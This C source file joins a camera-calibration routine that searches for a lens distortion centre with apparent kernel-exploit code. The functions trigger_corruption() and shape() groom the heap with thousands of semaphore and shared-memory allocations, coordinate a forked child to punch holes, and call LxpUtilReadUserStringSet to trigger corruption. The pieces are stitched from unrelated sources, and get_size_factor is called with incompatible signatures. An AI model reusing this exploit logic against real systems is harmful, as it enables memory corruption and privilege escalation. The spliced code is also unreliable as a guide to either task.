/*
 * Search a grid of candidate distortion centres and report the best one.
 *
 * The search starts at (xsize / 2, ysize / 2), using integer division.
 * Two passes follow, each over a 21 x 21 grid of offsets in [-10, 10]:
 * the first uses a step of 5 around the starting point, the second a step
 * of 0.5 around the best candidate found so far.  Every candidate is scored
 * by calc_distortion2() and the lowest score wins.  The running best is
 * printed once after the initial evaluation and once after each grid row.
 *
 * patt         calibration data, handed unchanged to calc_distortion2()
 * xsize, ysize image dimensions
 * dist_factor  output: [0] and [1] receive the best centre, [2] the third
 *              factor recorded with it, [3] the value returned by
 *              get_size_factor( best, xsize, ysize )
 */
void calc_distortion( CALIB_PATT_T *patt, int xsize, int ysize, double dist_factor[4] )
{
    static const double steps[2] = { 5.0, 0.5 };
    double cand[4];
    double best[4];
    double best_err, err;
    double cx, cy;
    int    pass, row, col;

    cand[0] = xsize / 2;
    cand[1] = ysize / 2;
    cand[3] = 1.0;

    /*
     * cand[2] is never assigned in this function but is read after every
     * call below.  NOTE(review): presumably calc_distortion2() writes it
     * through the pointer -- confirm against its definition.
     */
    best_err = calc_distortion2( patt, cand );
    best[0] = cand[0];
    best[1] = cand[1];
    best[2] = cand[2];
    best[3] = 1.0;
    printf("[%5.1f, %5.1f, %5.1f] %f\n", best[0], best[1], best[2], best_err);

    for( pass = 0; pass < 2; pass++ ) {
        /* Each pass is centred on the best candidate known when it starts. */
        cx = best[0];
        cy = best[1];

        for( row = -10; row <= 10; row++ ) {
            cand[1] = cy + row * steps[pass];

            for( col = -10; col <= 10; col++ ) {
                cand[0] = cx + col * steps[pass];

                err = calc_distortion2( patt, cand );
                if( err < best_err ) {
                    best_err = err;
                    best[0] = cand[0];
                    best[1] = cand[1];
                    best[2] = cand[2];
                }
            }

            printf("[%5.1f, %5.1f, %5.1f] %f\n", best[0], best[1], best[2], best_err);
        }
    }

    dist_factor[0] = best[0];
    dist_factor[1] = best[1];
    dist_factor[2] = best[2];
    dist_factor[3] = get_size_factor( best, xsize, ysize );
}
/*
 * Turn spray_size into an allocation size and a stop index, then pass them
 * to call_LxpUtilReadUserStringSet() and print what it returned.
 *
 * get_size_factor(), calc_stop_idx() and call_LxpUtilReadUserStringSet()
 * are defined elsewhere; nothing about their behaviour is visible here.
 *
 * Returns -1 from the size check and 0 otherwise.  The callee's own return
 * value is only printed, never propagated to the caller.
 */
int trigger_corruption(int spray_size)
{
    size_t scale = 0;
    size_t hole_bytes = get_size_factor(spray_size, &scale);

    /*
     * NOTE(review): hole_bytes is a size_t, so "< 0" can never hold and
     * this branch is unreachable as written.
     */
    if (hole_bytes < 0) {
        printf("[*err*] unsupported spray_size == 0x%x", spray_size);
        return -1;
    }

    size_t stop_at = calc_stop_idx(hole_bytes, scale);
    int rc = call_LxpUtilReadUserStringSet(scale + 1, 1, 'O', stop_at);

    printf("[*] trigger_corruption() returned 0x%x\n", rc);
    return 0;
}
/*
 * Run a fixed sequence of allocations through spray(), alloc_sem() and
 * alloc_shm(), split between this process and a forked child that are kept
 * in step over a socketpair, then release the first batch with free_sem().
 *
 * spray_size  output: receives the value returned by spray(1).
 *
 * Returns 1 if socketpair() fails or spray(1) returns (size_t)-1, and 0
 * otherwise.  The forked child never returns from this function; it ends
 * with exit(1).
 *
 * spray(), alloc_sem(), alloc_shm(), free_sem() and get_size_factor() are
 * defined elsewhere.  NOTE(review): the names suggest System V semaphore
 * and shared-memory objects -- confirm against the helpers.
 *
 * What is visible from the outside: one process issues roughly 0x4420
 * alloc_sem() calls back to back, forks a short-lived child, and then
 * issues 0x100 more alloc_sem() calls and 0x500 alloc_shm() calls.
 */
int shape(size_t *spray_size)
{
    size_t keys[0x400];     // handles from the first alloc_sem() batch, freed at the end
    int exec[2];            // not used anywhere in this function
    int sv[2];              // socketpair ends: parent uses sv[1], child uses sv[0]
    char flag;              // one-byte scratch buffer for the sync reads
    size_t bytes = 0, tofree = 0;
    size_t factor,hole_size;
    struct flock fl;        // zeroed below, otherwise unused here
    memset(&fl, 0, sizeof(fl));
    pid_t pid, wpid;
    int status;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1) {
        printf("[*err] socketpair failed\n");
        return 1;
    }

    // spray() reports failure as (size_t)-1.
    bytes = spray(1);
    if (bytes == (size_t)-1) {
        printf("[*err*] bytes < 0, are you root?\n");
        return 1;
    }

    *spray_size = bytes;
    hole_size = get_size_factor(*spray_size, &factor);
    // Count handed to the child's spray() call: hole_size in units of
    // `bytes`, plus one. `factor` is filled in but not read afterwards.
    tofree = hole_size / (bytes / 1) + 1;

    printf("[*] allocate holes before the workspace\n");
    // Only this first batch is recorded in keys[]; the results of the three
    // batches after it are discarded.
    for (int i = 0; i < 0x400; ++i) {
        keys[i] = alloc_sem(0x7000);
    }

    for (int i = 0; i < 0x20; ++i) {
        alloc_sem(0x7000);
    }

    for (int i = 0; i < 0x2000; ++i) {
        alloc_sem(4063);
    }

    for (int i = 0; i < 0x2000; ++i) {
        alloc_sem(3);
    }

    pid = fork();

    // Phase 1: the parent sprays first, signals the child with one byte,
    // then blocks until the child signals back.
    if (pid > 0) {
        printf("[*] alloc 0xc pages groups, adjust to continuous allocations\n");
        bytes = spray(5);
        write(sv[1], "p", 1);
        read(sv[1], &flag, 1);
    } else {
        // child process: waits for the parent's byte, sprays, signals back
        read(sv[0], &flag, 1);
        printf("[*] alloc workspace pages\n");
        bytes = spray(tofree);
        printf("[*] finish allocate workspace allocations\n");
        write(sv[0], "p", 1);
    }

    // Phase 2: the parent allocates again and signals; the child waits for
    // that signal and then exits.
    if (pid > 0) {
        printf("[*] allocating (0xc - shm | shm) AFTER the workspace\n");
        for (int i = 0; i < 0x100; ++i) {
            alloc_sem(4061);
            for (int j = 0; j < 0x5; ++j) {
                alloc_shm(i * 0x100 + j);
            }
        }
        write(sv[1], "p", 1);
    } else {
        read(sv[0], &flag, 1);
        printf("[*] free middle allocation, creating workspace freed\n");
        exit(1);
    }

    // Reap children until wait() stops returning a positive pid.
    while ((wpid = wait(&status)) > 0);

    printf("[*] free prepared holes, create little pages holes before the workspace\n");
    for (int i = 0; i < 0x400; ++i) {
        free_sem(keys[i]);
    }

    return 0;
}